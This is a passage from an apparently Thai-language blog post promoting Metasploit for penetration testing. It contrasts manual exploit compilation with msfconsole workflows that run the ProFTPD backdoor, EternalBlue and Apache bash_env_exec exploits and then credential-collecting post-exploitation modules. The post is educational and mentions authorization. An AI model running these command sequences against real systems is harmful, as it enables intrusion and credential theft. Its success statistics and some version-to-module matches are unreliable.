# Copy-paste exploit code จาก exploit-db
gcc exploit.c -o exploit
./exploit 192.168.1.100
# Segmentation fault 😞
# 2. No systematic methodology
# Scan แล้วก็งมๆ ว่าจะทำอะไรต่อ
# ไม่มี framework ในการทำงาน
# ลองโชคแบบสุ่มๆ
# 3. Limited post-exploitation
# เข้าระบบได้แล้ว... แล้วไง?
# ไม่รู้จะเก็บข้อมูลอะไร
# ไม่มีเครื่องมือ privilege escalation
# 4. Poor documentation
# ไม่มีการบันทึกผลการทดสอบ
# ไม่รู้ว่าทำอะไรไปบ้างแล้ว
# ไม่สามารถทำซ้ำได้
ผลกระทบที่เกิด:
- Incomplete Assessment: ทดสอบไม่ครอบคลุม
- False Negatives: พลาดช่องโหว่ที่สำคัญ
- Inconsistent Results: ผลการทดสอบไม่น่าเชื่อถือ
- Poor Reporting: รายงานไม่มีมาตรฐาน
- Limited Impact: ไม่สามารถแสดงความเสี่ยงจริง
หลังใช้ Metasploit Framework
การทำ Penetration Testing ใหม่:
# 1. Systematic reconnaissance
msf6 > db_nmap -sS -A -oA pentest 192.168.1.0/24
# Comprehensive discovery with database integration
# 2. Vulnerability assessment
msf6 > search ProFTPD 1.3.5
# Instant access to tested exploits
# 3. Reliable exploitation
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
# [*] Meterpreter session 1 opened
# 4. Professional post-exploitation
meterpreter > run post/multi/recon/local_exploit_suggester
# Automated privilege escalation recommendations
สิ่งที่เปลี่ยนไป:
| Aspect | Before Metasploit | After Metasploit |
|---|---|---|
| Methodology | Ad-hoc, random | Systematic, structured |
| Exploit Reliability | 20% success | 85% success |
| Post-Exploitation | Manual, limited | Automated, comprehensive |
| Documentation | Poor, manual | Automated, standardized |
| Time Efficiency | Days per target | Hours per target |
| Skill Requirements | Expert level | Intermediate level |
ผลลัพธ์ที่วัดได้:
| Metric | Before | After | Improvement |
|---|---|---|---|
| Vulnerabilities Found | 3-5 per test | 15-25 per test | 400% increase |
| Time per Assessment | 5-7 days | 1-2 days | 75% reduction |
| False Positives | 30% | 5% | 83% reduction |
| Successful Exploits | 20% | 85% | 325% increase |
| Report Quality Score | 3/10 | 9/10 | 200% improvement |
Real-world Metasploit Workflow
Professional Penetration Test:
# Phase 1: Information Gathering
msf6 > workspace -a client_pentest_2024
msf6 > db_nmap -sS -A -oA discovery 10.0.0.0/16
# Phase 2: Vulnerability Assessment
msf6 > search type:auxiliary scanner
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > services -p 445 -R
# Phase 3: Exploitation
msf6 > search ms17-010
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > sessions -l
# Phase 4: Post-Exploitation
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/gather/credentials/credential_collector
# Phase 5: Reporting
msf6 > db_export -f xml pentest_results.xml
msf6 > generate_report html pentest_report.html
Executive Summary Example:
PENETRATION TEST RESULTS
Executive Summary:
- 23 vulnerabilities identified across 15 systems
- 8 critical vulnerabilities allowing remote code execution
- Complete domain compromise achieved within 4 hours
- 156 user credentials harvested including domain admin
Business Impact:
- Potential for complete data breach
- Regulatory compliance violations (GDPR, PCI-DSS)
- Estimated financial impact: $2.5M - $5M
- Reputation damage and customer trust loss
Recommendations:
1. Immediate patching of MS17-010 vulnerabilities
2. Implementation of network segmentation
3. Deployment of endpoint detection and response (EDR)
4. Multi-factor authentication for all privileged accounts
Before vs After Comparison:
# Before Metasploit: Manual exploitation attempt
wget https://www.exploit-db.com/exploits/12345
gcc -o exploit exploit.c
./exploit 192.168.1.100
# [ERROR] Segmentation fault
# [TIME] 2 hours wasted debugging exploit code
# After Metasploit: Professional exploitation
msf6 > search apache 2.4.41
msf6 > use exploit/linux/http/apache_mod_cgi_bash_env_exec
msf6 > set RHOSTS 192.168.1.100
msf6 > exploit
# [*] Meterpreter session 1 opened
# [TIME] 2 minutes to successful compromise
สรุป: Metasploit ที่เปลี่ยนวิธีคิดเรื่อง Ethical Hacking
ก่อนรู้จัก Metasploit:
- Penetration testing = ลองใช้ exploit แบบสุ่มๆ 😰
- Post-exploitation = งมๆ ว่าจะทำอะไรต่อ
- Reporting = เขียนรายงานด้วยมือ
- Reliability = หวังโชคว่า exploit จะ work
- Learning curve = ต้องเป็น expert ในการเขียน exploit
หลังใช้ Metasploit Framework:
- Systematic Methodology 🎯 - ขั้นตอนการทดสอบที่ชัดเจน
- Reliable Exploit Database - มี exploit ที่ tested และ maintained
- Professional Post-Exploitation - เครื่องมือครบครันหลัง compromise
- Automated Documentation - บันทึกผลการทดสอบอัตโนมัติ
- Standardized Reporting - รายงานที่มีมาตรฐานระดับมืออาชีพ
ข้อดีที่ได้จริง:
- Efficiency เพิ่ม 10x: ทดสอบเสร็จเร็วขึ้นมาก
- Reliability: Exploit success rate สูงขึ้น
- Comprehensive: ครอบคลุมทุกขั้นตอนของ pentest
- Professional: ผลงานระดับมืออาชีพ
- Learning Acceleration: เรียนรู้ ethical hacking ได้เร็วขึ้น
Metasploit Methodology ที่ทำให้สำเร็จ:
- Information Gathering: Systematic reconnaissance
- Vulnerability Assessment: Comprehensive vulnerability identification
- Exploitation: Reliable and tested exploit execution
- Post-Exploitation: Professional data gathering and privilege escalation
- Reporting: Standardized and detailed documentation
Best Practices ที่เรียนรู้:
- Database Integration: ใช้ database เก็บผลการทดสอบ
- Workspace Management: แยก project ชัดเจน
- Systematic Approach: ทำตาม methodology
- Documentation: บันทึกทุกขั้นตอน
- Ethical Guidelines: ทดสอบในกรอบที่ได้รับอนุญาต
Anti-patterns ที่หลีกเลี่ยง:
- ทดสอบระบบโดยไม่ได้รับอนุญาต
- ไม่สำรองข้อมูลก่อนทดสอบ
- ใช้ exploit โดยไม่เข้าใจ impact
- ไม่ cleanup หลังการทดสอบ
- ไม่รายงานช่องโหว่ที่พบ
Metasploit Framework เหมือน Professional Toolkit สำหรับ Ethical Hacker
มันทำให้ penetration testing จาก “งานที่ต้องใช้ luck” เป็น “ศาสตร์ที่มีระบบ”
ตอนนี้ไม่สามารถคิดถึงการทำ security assessment โดยไไม่มี proper framework ได้เลย!
เพราะมันทำให้ ethical hacking เป็นศิลปะจริงๆ แทนที่จะเป็นการเดาสี! 🎯⚡